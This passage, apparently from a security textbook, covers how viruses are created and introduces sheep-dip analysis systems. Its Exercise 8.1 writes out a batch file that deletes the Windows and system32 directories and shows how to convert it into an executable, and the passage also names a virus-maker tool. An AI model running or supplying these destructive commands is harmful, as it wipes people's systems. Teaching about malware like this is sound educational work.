Malware 189
How to Create a Virus
Creating a virus is a process that can be very complicated or something that happens with
a few button clicks (see Exercise 8.1). Advanced programmers may choose to code the
malware from scratch. The less savvy or experienced may have to pursue other options,
such as hiring someone to write the virus, purchasing code, or using an “underground”
virus-maker application.
CREATING A VIRUS
Exercise 8.1: Creating a Simple Virus
So: let’s write a simple virus. You need access to Notepad and bat2com, the latter of which
you can find on the Internet:
Before you get started, here’s a warning: Do not execute this virus. This exercise is meant
to be a proof of concept and for illustrative purposes only. Executing this code on your
system could result in damage to your system that may require extensive time and skill to fix
properly. With that said, follow these steps:
- Create a batch file called virus.bat using Windows Notepad.
- Enter the following lines of code:
@echo off
Del c:\windows\system32\*.*
Del c:\windows\*.*- Save virus.bat.
- From the command prompt, use bat2com to convert virus.bat into virus.com.
Another way to create a virus is to use a utility such as JPS Virus Maker. It is a simple
utility in which you pick options from a GUI and then choose to create a new executable
file that can be used to infect a host. Figure 8.1 shows the interface for JPS Virus Maker.
Researching Viruses
There are many defensive techniques for fighting malware, many of which we will
discuss later in this chapter; but what about researching new malware? If you need to
investigate and analyze malware in addition to defending against it, you should know
about a mechanism known as a sheep-dip system. A sheep dip system is a computer that is
specifically configured to analyze files. The system typically is stripped down and includes
only those services and applications needed to test software to ascertain whether or not
it is safe.